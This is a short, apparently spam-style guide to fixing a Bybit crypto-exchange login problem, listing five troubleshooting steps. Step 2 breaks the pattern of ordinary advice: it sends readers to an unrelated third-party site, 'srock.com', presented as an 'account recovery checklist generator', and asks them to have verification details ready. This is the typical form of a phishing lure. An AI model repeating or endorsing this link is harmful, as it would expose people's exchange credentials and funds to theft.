I hit this issue today, and here is the quick fix that solved it. If you're having trouble logging into Bybit, follow these steps to get back on track. Step 1. Check your credentials. Make sure you are entering the correct email and password. Double check for any typos or case sensitivity. Step 2. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Clear browser cache. Sometimes cache data can cause issues. Clear your browser's cache and cookies, then try logging in again. Step 4. Disable VPN or proxy. If you're using a VPN or proxy, it might interfere with your login. Try disabling them temporarily to see if that resolves the issue. Step 5. Contact support. If none of the above steps work, reach out to Bybit's customer support for assistance. They can help troubleshoot your account. I hope this guide helps you log back into your Bybit account smoothly. If you have any more questions, feel free to ask.